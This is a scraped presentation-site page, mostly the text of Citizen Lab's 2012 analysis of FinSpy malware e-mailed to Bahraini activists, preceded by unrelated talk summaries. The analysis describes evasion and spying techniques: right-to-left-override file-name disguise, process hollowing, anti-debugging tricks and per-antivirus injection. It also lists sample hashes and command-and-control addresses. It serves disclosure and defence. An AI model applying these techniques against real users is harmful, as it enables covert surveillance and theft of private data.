This document discusses Indicators of Compromise (IOCs) related to APT1, a Chinese cyber espionage group. It provides links to download the IOCs and explains how they can be used with Mandiant tools like Redline and MIR to detect malware. The document also defines IOCs and describes how the included IOCs were developed and may differ from other Mandiant IOCs. It notes that the IOCs focus on detecting known malware families and may not find new variants.
This document contains a list of hexadecimal strings that are identifiers or codes for unknown items or entities. There are over 200 unique hexadecimal strings included ranging in length from 8 to 32 characters each.
This document contains a list of over 300 domain names. Many of the domain names contain misspellings of popular brands and websites like cnn, yahoo, firefox, and microsoft. The domains appear to be related to phishing or spreading malware by posing as legitimate websites or software updates.
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
Effective approaches to web application security at scale involve making things safe by default through universal output encoding, detecting risky functionality changes through automated alerts, automating tests to find simple issues, and monitoring metrics to identify attacks and problems off-hours through automated alerts on thresholds.
Windows 8. important considerations for computer forensics and electronic dis...Yury Chemerkin
Windows 8 stores email communications and contacts locally in a format that presents challenges for attorney review in litigation. The testing revealed that Windows 8 imports emails, contacts, and social media information from connected web accounts. Over 2,000 email files were found locally stored in EML format, but no files were found in common formats like MSG, PST, or MBOX. This local storage of email presents potential issues for efficiently processing the communications for discovery in litigation.
The stuxnet computer worm. harbinger of an emerging warfare capabilityYury Chemerkin
The document summarizes a Congressional Research Service report on the Stuxnet computer worm. It discusses how Stuxnet targeted Iranian nuclear facilities by infecting industrial control systems. It affected systems in several countries and demonstrated that cyber attacks could disrupt critical infrastructure. The report examines questions for Congress about national security, an international treaty on malicious software, and protecting critical infrastructure from cyber threats.
This document is a newsletter from security consulting firm XMCO Partners. It discusses the Stuxnet malware, including analyzing its myths and realities in part one and its technical workings in part two. It also covers the MS10-073 "keyboard layout" vulnerability exploited by Stuxnet, current hacking news, and blogs and software mentioned by the firm. The newsletter is intended to keep clients informed of recent security topics and XMCO's services, which include intrusion testing, security audits, and vulnerability monitoring.
Stuxnet was a sophisticated malware targeting industrial control systems that was attributed to nation-state sponsorship. The document discusses techniques for attributing malware through analysis of exploits, code quality, debug symbols, and automation. Attribution aims to profile adversary capabilities and differentiate between state-sponsored and criminal actors. Analysis of Stuxnet found use of older vulnerabilities, custom payloads, and insider knowledge of target systems, suggesting a high level of technical skill and resources from a nation state.
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
Trusted Execution Environment for Decentralized Process MiningLucaBarbaro3
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxSitimaJohn
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on automated letter generation for Bonterra Impact Management using Google Workspace or Microsoft 365.
Interested in deploying letter generation automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Dive into the realm of operating systems (OS) with Pravash Chandra Das, a seasoned Digital Forensic Analyst, as your guide. 🚀 This comprehensive presentation illuminates the core concepts, types, and evolution of OS, essential for understanding modern computing landscapes.
Beginning with the foundational definition, Das clarifies the pivotal role of OS as system software orchestrating hardware resources, software applications, and user interactions. Through succinct descriptions, he delineates the diverse types of OS, from single-user, single-task environments like early MS-DOS iterations, to multi-user, multi-tasking systems exemplified by modern Linux distributions.
Crucial components like the kernel and shell are dissected, highlighting their indispensable functions in resource management and user interface interaction. Das elucidates how the kernel acts as the central nervous system, orchestrating process scheduling, memory allocation, and device management. Meanwhile, the shell serves as the gateway for user commands, bridging the gap between human input and machine execution. 💻
The narrative then shifts to a captivating exploration of prominent desktop OSs, Windows, macOS, and Linux. Windows, with its globally ubiquitous presence and user-friendly interface, emerges as a cornerstone in personal computing history. macOS, lauded for its sleek design and seamless integration with Apple's ecosystem, stands as a beacon of stability and creativity. Linux, an open-source marvel, offers unparalleled flexibility and security, revolutionizing the computing landscape. 🖥️
Moving to the realm of mobile devices, Das unravels the dominance of Android and iOS. Android's open-source ethos fosters a vibrant ecosystem of customization and innovation, while iOS boasts a seamless user experience and robust security infrastructure. Meanwhile, discontinued platforms like Symbian and Palm OS evoke nostalgia for their pioneering roles in the smartphone revolution.
The journey concludes with a reflection on the ever-evolving landscape of OS, underscored by the emergence of real-time operating systems (RTOS) and the persistent quest for innovation and efficiency. As technology continues to shape our world, understanding the foundations and evolution of operating systems remains paramount. Join Pravash Chandra Das on this illuminating journey through the heart of computing. 🌟
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
1. !
!
!
!
!
Research Brief
The Citizen Lab Number 09 – July 2012
From Bahrain with Love:
FinFisher’s Spy Kit Exposed?
INTRODUCTION
Click here to read the Bloomberg News article.
The FinFisher Suite is described by its distributors, Gamma International UK Ltd., as “Governmental IT
Intrusion and Remote Monitoring Solutions.” 1 The toolset first gained notoriety after it was revealed that the
Egyptian Government’s state security apparatus had been involved in negotiations with Gamma International
UK Ltd. over the purchase of the software. Promotional materials have been leaked that describe the tools as
providing a wide range of intrusion and monitoring capabilities.2 Despite this, however, the toolset itself has
not been publicly analyzed.
This post contains analysis of several pieces of malware obtained by Vernon Silver of Bloomberg News that
were sent to Bahraini pro-democracy activists in April and May of this year. The purpose of this work is
identification and classification of the malware to better understand the actors behind the attacks and the risk
to victims. In order to accomplish this, we undertook several different approaches during the investigation.
As well as directly examining the samples through static and dynamic analysis, we infected a virtual machine
(VM) with the malware. We monitored the filesystem, network, and running operating system of the infected
VM.
This analysis suggests the use of “Finspy”, part of the commercial intrusion kit, Finfisher, distributed by
Gamma International.
DELIVERY
This section describes how the malware was delivered to potential victims using e-mails with malicious
attachments.
!
1
2. Number 09 – July 2012
In early May, we were alerted that Bahraini activists were targeted with apparently malicious e-mails. The
emails ostensibly pertained to the ongoing turmoil in Bahrain, and encouraged recipients to open a series of
suspicious attachments. The screenshot below is indicative of typical message content:
The attachments to the e-mails we have been able to analyze were typically .rar files, which we found to
contain malware. Note that the apparent sender has an e-mail address that indicates that it was being sent by
“Melissa Chan,” who is a real correspondent for Aljazeera English. We suspect that the e-mail address is not
her real address.3 The following samples were examined:
324783fbc33ec117f971cca77ef7ceaf7ce229a74edd6e2b3bd0effd9ed10dcc rar.
c5b39d98c85b21f8ac1bedd91f0b6510ea255411cf19c726545c1d0a23035914
_gpj.ArrestedXSuspects.rar
c5b37bb3620d4e7635c261e5810d628fc50e4ab06b843d78105a12cfbbea40d7
KingXhamadXonXofficialXvisitXtoX.rar
80fb86e265d44fbabac942f7b26c973944d2ace8a8268c094c3527b83169b3cc
MeetingXAgenda.rar
f846301e7f190ee3bb2d3821971cc2456617edc2060b07729415c45633a5a751 Rajab.rar
These contained executables masquerading as picture files or documents:
! 2
3. Number 09 – July 2012
49000fc53412bfda157417e2335410cf69ac26b66b0818a3be7eff589669d040 dialoge.exe
cc3b65a0f559fa5e6bf4e60eef3bffe8d568a93dbb850f78bdd3560f38218b5c exe.Rajab1.jpg
39b325bd19e0fe6e3e0fca355c2afddfe19cdd14ebda7a5fc96491fc66e0faba exe.image1.jpg
e48bfeab2aca1741e6da62f8b8fc9e39078db574881691a464effe797222e632 exe.Rajab.jpg
2ec6814e4bad0cb03db6e241aabdc5e59661fb580bd870bdb50a39f1748b1d14 Suspects.jpg
exe.Arrested
c29052dc6ee8257ec6c74618b6175abd6eb4400412c99ff34763ff6e20bab864 News about the existence of a
new dialogue between AlWefaq & Govt..doc
The emails generally suggested that the attachments contained political content of interest to pro-democracy
activists and dissidents. In order to disguise the nature of the attachments a malicious usage of the
“righttoleftoverride” (RLO) character was employed. The RLO character (U+202e in unicode) controls the
positioning of characters in text containing characters flowing from right to left, such as Arabic or Hebrew.
The malware appears on a victim’s desktop as “exe.Rajab1.jpg” (for example), along with the default
Windows icon for a picture file without thumbnail. But, when the UTF-8 based filename is displayed in
ANSI, the name is displayed as “gpj.1bajaR.exe”. Believing that they are opening a harmless “.jpg”, victims
are instead tricked into running an executable “.exe” file.4
Upon execution these files install a multi-featured trojan on the victim’s computer. This malware provides the
attacker with clandestine remote access to the victim’s machine as well as comprehensive data harvesting and
exfiltration capabilities.
INSTALLATION
This section describes how the malware infects the target machine.
! 3
4. Number 09 – July 2012
The malware displays a picture as expected. This differs from sample to sample. The sample “Arrested
Suspects.jpg” (“gpj.stcepsuS detserrA.exe”) displays:
It additionally creates a directory (which appears to vary from sample to sample):
C:Documents and SettingsXPMUserLocal SettingsTempTMP51B7AFEF
It copies itself there (in this case the malware appears as “Arrested Suspects.jpg”) where it is renamed:
C:Documents and SettingsXPMUserLocal SettingsTempTMP51B7AFEFArrested Suspects.jpg” =>
C:Documents and SettingsXPMUserLocal SettingsTempTMP51B7AFEFtmpD.tmp
Then it drops the following files:
C:DOCUME~1%USER%LOCALS~1Tempdelete.bat
C:DOCUME~1%USER%LOCALS~1Tempdriverw.sys
It creates the folder (the name of which varies from host to host):
! 4
5. Number 09 – July 2012
C:Documents and Settings%USER%Application DataMicrosoftInstaller{5DA45CC9-D840-47CC-9F86-
FD2E9A718A41}
This process is observable on the filesystem timeline of the infected host:
“driverw.sys” is loaded and then “delete.bat” is run which deletes the original payload and itself. It then
infects existing operating system processes, connects to the command and control server, and begins data
harvesting and exfiltration.
Examining the memory image of a machine infected with the malware shows that a technique for infecting
processes known as “process hollowing” is used. For example, the memory segment below from the
“winlogon.exe” process is marked as executable and writeable:
Here the malware starts a new instance of a legitimate process such as “winlogon.exe” and before the
process’s first thread begins, the malware de-allocates the memory containing the legitimate code and injects
malicious code in its place. Dumping and examining this memory segment reveals the following strings in the
infected process:
! 5
6. Number 09 – July 2012
Note the string:
y:lsvn_branchesfinspyv4.01finspyv2srclibslibgmpmpn-tdiv_qr.c
This file seems to correspond to a file in the GNU Multi-Precision arithmetic library:
http://gmplib.org:8000/gmp/file/b5ca16212198/mpn/generic/tdiv_qr.c
The process “svchost.exe” was also found to be infected in a similar manner:
! 6
7. Number 09 – July 2012
Further examination of the memory dump also reveals the following:
This path appears to reference the functionality that the malware uses to modify the boot sequence to enable
persistence:
! 7
8. Number 09 – July 2012
y:lsvn_branchesfinspyv4.01finspyv2srctargetbootkit_x32driverobjfre_w2k_x86i386bootkit_x32driver.p
db
A pre-infection vs post-infection comparison of the infected VM shows that the Master Boot Record (MBR)
was modified by code injected by the malware.
The strings found in memory “finspyv4.01” and “finspyv2” are particularly interesting. The FinSpy tool is
part of the FinFisher intrusion and monitoring toolkit.5
!
OBFUSCATION AND EVASION
This section describes how the malware is designed to resist analysis and evade identification.
The malware employs a myriad of techniques designed to evade detection and frustrate analysis. While
investigation into this area is far from complete, we discuss several discovered methods as examples of the
lengths taken by the developers to avoid identification.
A virtualised packer is used. This type of obfuscation is used by those that have “strong motives to prevent
their malware from being analyzed”.6
This converts the native x86 instructions of the malware into another custom language chosen from one of 11
code templates. At run-time, this is interpreted by an obfuscated interpreter customized for that particular
language. This virtualised packer was not recognised and appears to be bespoke.
Several anti-debugging techniques are used. This section of code crashes the popular debugger, OllyDbg.
.text:00401683 finit
.text:00401686 fld ds:tbyte_40168E
.text:0040168C jmp short locret_401698
———————————————————————
.text:0040168E tbyte_40168E dt 9.2233720368547758075e18
———————————————————————
.text:00401698 locret_401698:
.text:00401698 retn
! 8
9. Number 09 – July 2012
This float value causes OllyDbg to crash when trying to display its value. A more detailed explanation of this
can be found here.
To defeat DbgBreakPoint based debuggers, the malware finds the address of DbgBreakPoint, makes the page
EXECUTE_READWRITE and writes a NOP on the entry point of DbgBreakPoint.
The malware checks via PEB to detect whether or not it is being debugged, and if it is it returns a random
address.
The malware calls ZwSetInformationThread with ThreadInformationClass set to 0×11, which causes the
thread to be detached from the debugger.
The malware calls ZwQueryInformationProcess with ThreadInformationClass set to 0x(ProcessDebugPort)
and 0x1e (ProcessDebugObjectHandle) to detect the presence of a debugger. If a debugger is detected it jumps
to a random address. ZwQueryInformationProcess is also called to check the DEP status on the current
process, and it disables it if it’s found to be enabled.
The malware deploys a granular solution for Antivirus software, tailored to the AV present on the infected
machine. The malware calls ZwQuerySystemInformation to get ProcessInformation and ModuleInformation.
The malware then walks the list of processes and modules looking for installed AV software. Our analysis
indicates that the malware appears to have different code to Open/Create process and inject for each AV
solution. For some Anti-Virus software this even appears to be version dependent. The function
“ZwQuerySystemInformation” is also hooked by the malware, a technique frequently used to allow process
hiding:
! 9
10. Number 09 – July 2012
DATA HARVESTING AND ENCRYPTION
This section describes how the malware collects and encrypts data from the infected machine.
Our analysis showed that the malware collects a wide range of data from an infected victim. The data is
stored locally in a hidden directory, and is disguised with encryption prior to exfiltration. On the reference
victim host, the directory was:
“C:WindowsInstaller{49FD463C-18F1-63C4-8F12-49F518F127}.”
We conducted forensic examination of the files created in this directory and identified a wide range of data
collected. Files in this directory were found to be screenshots, keylogger data, audio from Skype calls,
passwords and more. For the sake of brevity we include a limited set of examples here.
The malware attempts to locate the configuration and password store files for a variety browsers and chat
clients as seen below:
! 10
11. Number 09 – July 2012
We observed the creation of the file “t111o00000000.dat” in the data harvesting directory, as shown in the
filesystem timeline below:
Thu Jun 14 2012 12:31:34 52719 mac. r/rr-xr-xr-x 0 0 26395-128-5 C:/WINDOWS/Installer/{49FD463C-
18F1-63C4-8F12-49F518F127}/09e493e2-05f9-4899-b661-c52f3554c644
Thu Jun 14 2012 12:32:18 285691 …b r/rrwxrwxrwx 0 0 26397-128-4 C:/WINDOWS/Installer/{49FD463C-
18F1-63C4-8F12-49F518F127}/t111o00000000.dat
Thu Jun 14 2012 12:55:12 285691 mac. r/rrwxrwxrwx 0 0 26397-128-4
C:/WINDOWS/Installer/{49FD463C-18F1-63C4-8F12-49F518F127}/t111o00000000.dat
4096 ..c. -/rr-xr-xr-x 0 0 26447-128-4
The infected process “winlogon.exe” was observed writing this file via Process:
! 11
12. Number 09 – July 2012
Examination of this file reveals that it is a screenshot of the desktop:
Many other modules providing specific exfiltration capabilities were observed. Generally, the exfiltration
modules write files to disk using the following naming convention: XXY1TTTTTTTT.dat. XX is a two-digit
hexadecimal module number, Y is a single-digit hexadecimal submodule number, and TTTTTTTT is a
hexadecimal representation of a unix timestamp (less 1.3 billion) associated with the file creation time.
! 12
13. Number 09 – July 2012
ENCRYPTION
The malware uses encryption in an attempt to disguise harvested data in the .dat files intended for exfiltration.
Data written to the files is encrypted using AES-256-CBC (with no padding). The 32-byte key consists of 8
readings from memory address 0x7ffe0014: a special address in Windows that contains the low-order-4-bytes
of the number of hundred-nanoseconds since 1 January 1601. The IV consists of 4 additional readings.
The AES key structure is highly predictable, as the quantum for updating the system clock
(HKLMSYSTEMCurrentControlSetServicesW32TimeConfigLastClockRate) is set to 0x2625A
hundred-nanoseconds by default, and the clock readings that comprise the key and IV are taken in a tight loop:
…
0x406EA4: 8D45C0 LEA EAX,[EBP-0x40]
0x406EA7: 50 PUSH EAX
0x406EA8: FF150C10AF01 CALL DWORD PTR [0x1AF100C]
0x406EAE: 8B4DE8 MOV ECX,DWORD PTR [EBP-0x18]
0x406EB1: 8B45C0 MOV EAX,DWORD PTR [EBP-0x40]
0x406EB4: 8345E804 ADD DWORD PTR [EBP-0x18],0×4
0x406EB8: 6A01 PUSH 0×1
0x406EBA: 89040F MOV DWORD PTR [EDI+ECX],EAX
0x406EBD: FF152810AF01 CALL DWORD PTR [0x1AF1028]
0x406EC3: 817DE800010000 CMP DWORD PTR [EBP-0x18],0×100
0x406ECA: 72D8 JB 0x406EA4
0x406ECC: 80277F AND BYTE PTR [EDI],0x7F
…
The following AES keys were among those found to be used to encrypt records in .dat files. The first contains
the same 4 bytes repeated, whereas in the second key, the difference between all consecutive 4-byte blocks
(with byte order swapped) is 0x2625A.
70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31
bd cc 70 31 bd cc
26 e9 23 60 80 4b 26 60 da ad 28 60 34 10 2b 60 8e 72 2d 60 e8 d4 2f 60 42 37
32 60 9c 99 34 60
In all, 64 clock readings are taken. The readings are encrypted using an RSA public key found in memory
(whose modulus begins with A25A944E) and written to the .dat file before any other encrypted data. No
! 13
14. Number 09 – July 2012
padding is used in the encryption, yielding exactly 256 encrypted bytes. After the encrypted timestamp
values, the file contains a number of records encrypted with AES, delimited by EAE9E8FF.
In reality, these records are only partially encrypted: if the record’s length is not a multiple of 16 bytes (the
AES block size), then the remainder of the bytes are written to the file unencrypted. For example, after typing
“FinSpy” on the keyboard, the keylogger module produced the following (trailing plaintext highlighted):
The predictability of the AES encryption keys allowed us to decrypt and view these partially-encrypted
records in full plaintext. The nature of the records depends on the particular module and submodule. For
example, submodule Y == 5 of the Skype exfiltration module (XX == 14), contains a csv representation of the
user’s contact list:
Record # 0 Length: 243 bytes:
ó
@þÿ̳Ð
@
¤b¯Opþ192.168.131.67JRecordingEcsv 0þ-0800UTC DST.1þ2012-07-18 18:00:21.:þ1970-01-01
00:16:00Abhwatch1
Record # 1 Length: 96 bytes:
`USERNAME,FULLNAME,COUNTRY,AUTHORIZED,BLOCKED
Record # 2 Length: 90 bytes:
Zecho123,Echo / Sound Test Service,,YES,NO
Record # 3 Length: 95 bytes:
^bhwatch2,Bahrain Watch,United States,YES,NO
Submodule Y == 3 records file transfers. After a Skype file transfer concludes, the following file is created:
%USERPROFILE%Local SettingsTempsmtXX.tmp. This file appears to contain the sent / received file.
! 14
15. Number 09 – July 2012
As soon as smtXX.tmp is finished being written to disk, a file (1431XXXXXXXX.dat) is written, roughly the
same size as smtXX.tmp. After sending a picture (of birdshot shotgun shell casings used by Bahrain’s police)
to an infected Skype client, the file 1431028D41FD.dat was observed being written to disk. Decrypting it
revealed the following:
Record # 0 Length: 441 bytes:
¹
@þÿ̳Ð
@
¤b¯Opþ192.168.131.67Abhwatch1Bbhwatch2″CBahrain WatchIreceivedrC:Documents and
SettingsXPMUserMy Documentsgameborev3.jpgJRecording 0þ-0800UTC DST.1þ2012-07-20
12:18:21.:þ2012-07-20 12:18:21
Record # 1 Length: 78247 bytes:
[Note: Record #1 contained the contents of the .jpg file, preceded by hex A731010090051400, and followed
by hex 0A0A0A0A.]
Additionally, submodule Y == 1 records Skype chat messages, and submodule Y == 2 records audio from all
participants in a Skype call. The call recording functionality appears to be provided by hooking
DirectSoundCaptureCreate:
! 15
16. Number 09 – July 2012
COMMAND AND CONTROL
This section describes the communications behavior of the malware.
When we examined the malware samples we found that they connect to a server at IP address 77.69.140.194
WHOIS data7 reveals that this address is owned by Batelco, the principal telecommunications company of
Bahrain:
! 16
17. Number 09 – July 2012
inetnum: 77.69.128.0 – 77.69.159.255
netname: ADSL
descr: Batelco ADSL service
country: bh
For a period of close to 10 minutes, traffic was observed between the infected victim and the command and
control host in Bahrain.
A summary of the traffic by port and conversation size:
The infected VM talks to the remote host on the following five TCP ports:
22
53
80
443
4111
Based on observation of an infected machine we were able to determine that the majority of data is exfiltrated
to the remote host via ports 443 and 4111.
192.168.131.65:1213 -> 77.69.140.194:443 1270075 bytes
192.168.131.65:4111 -> 77.69.149.194:4111 4766223 bytes
! 17
18. Number 09 – July 2012
CONCLUSIONS ABOUT MALWARE IDENTIFICATION
Our analysis yields indicators about the identity of the malware we have analyzed: (1) debug strings found the
in memory of infected processes appear to identify the product and (2) the samples have similarities with
malware that communicates with domains belonging to Gamma International.
Debug Strings found in memory
As we previously noted, infected processes were found containing strings that include “finspyv4.01”
and “finspyv2”:
y:lsvn_branchesfinspyv4.01finspyv2srclibslibgmpmpn-tdiv_qr.c
y:lsvn_branchesfinspyv4.01finspyv2srclibslibgmpmpn-mul_fft.c
y:lsvn_branchesfinspyv4.01finspyv2srctargetbootkit_x32driverobjfre_w2k_x86i386bootkit_x32
driver.pdb
Publicly available descriptions of the FinSpy tool collected by Privacy International among others and
posted on Wikileaks8 make the a series of claims about functionality:
• Bypassing of 40 regularly tested Antivirus Systems
• Covert Communication with Headquarters
• Full Skype Monitoring (Calls, Chats, File Transfers, Video, Contact List)
• Recording of common communication like Email, Chats and Voice-over-IP
• Live Surveillance through Webcam and Microphone
• Country Tracing of Target
• Silent Extracting of Files from Hard-Disk
• Process-based Key-logger for faster analysis
• Live Remote Forensics on Target System
• Advanced Filters to record only important information
• Supports most common Operating Systems (Windows, Mac OSX and Linux)
! 18
19. Number 09 – July 2012
Shared behavior with a sample that communicates with Gamma
The virtual machine used by the packer has very special sequences in order to execute the virtualised
code, for example:
66 C7 07 9D 61 mov word ptr [edi], 619Dh
C6 47 02 68 mov byte ptr [edi+2], 68h
89 57 03 mov [edi+3], edx
C7 47 07 68 00 00 00 mov dword ptr [edi+7], 68h
89 47 08 mov [edi+8], eax
C6 47 0C C3 mov byte ptr [edi+0Ch], 0C3h
Based on this we created a signature from the Bahrani malware, which we shared with another security
researcher who identified a sample that shared similar virtualised obfuscation. That sample is:
md5: c488a8aaef0df577efdf1b501611ec20
sha1: 5ea6ae50063da8354e8500d02d0621f643827346
sha256: 81531ce5a248aead7cda76dd300f303dafe6f1b7a4c953ca4d7a9a27b5cd6cdf
The sample connects to the following domains:
tiger.gamma-international.de
ff-demo.blogdns.org
The domain tiger.gamma-international.de has the following Whois information9:
! 19
20. Number 09 – July 2012
Domain: gamma-international.de
Name: Martin Muench
Organisation: Gamma International GmbH
Address: Baierbrunner Str. 15
PostalCode: 81379
City: Munich
CountryCode: DE
Phone: +49-89-2420918-0
Fax: +49-89-2420918-1
Email: info@gamma-international.de
Changed: 2011-04-04T11:24:20+02:00
Martin Muench is a representative of Gamma International, a company that sells “advanced technical
surveillance and monitoring solutions”. One of the services they provide is FinFisher: IT Intrusion,
including the FinSpy tool. This labelling indicates that the matching sample we were provided may be
a demo copy a FinFisher product per the domain ff-demo.blogdns.org.
We have linked a set of novel virtualised code obfuscation techniques in our Bahraini samples to
another binary that communicates with Gamma International IP addresses. Taken alongside the
explicit use of the name “FinSpy” in debug strings found in infected processes, we suspect that the
malware is the FinSpy remote intrusion tool. This evidence appears to be consistent with the theory
that the dissidents in Bahrain who received these e-mails were targeted with the FinSpy tool,
configured to exfiltrate their harvested information to servers in Bahraini IP space. If this is not the
case, we invite Gamma International to explain.
RECOMMENDATIONS
The samples from email attachments have been shared with selected individuals within the security
community, and we strongly urge antivirus companies and security researchers to continue where we have left
off.
Be wary of opening unsolicited attachments received via email, skype or any other communications
mechanism. If you believe that you are being targeted it pays to be especially cautious when downloading
files over the Internet, even from links that are purportedly sent by friends.
ACKNOWLEDGEMENTS
Malware analysis by Morgan Marquis-Boire and Bill Marczak. Assistance from Seth Hardy and Harry Tuttle
gratefully received.
! 20
21. Number 09 – July 2012
Special thanks to John Scott-Railton.
Thanks to Marcia Hofmann and the Electronic Frontier Foundation (EFF).
We would also like to acknowledge Privacy International for their continued work and graciously provided
background information on Gamma International.
FOOTNOTES
1
http://www.finfisher.com/
2
http://owni.eu/2011/12/15/finfisher-for-all-your-intrusive-surveillance-needs/#SpyFiles
3
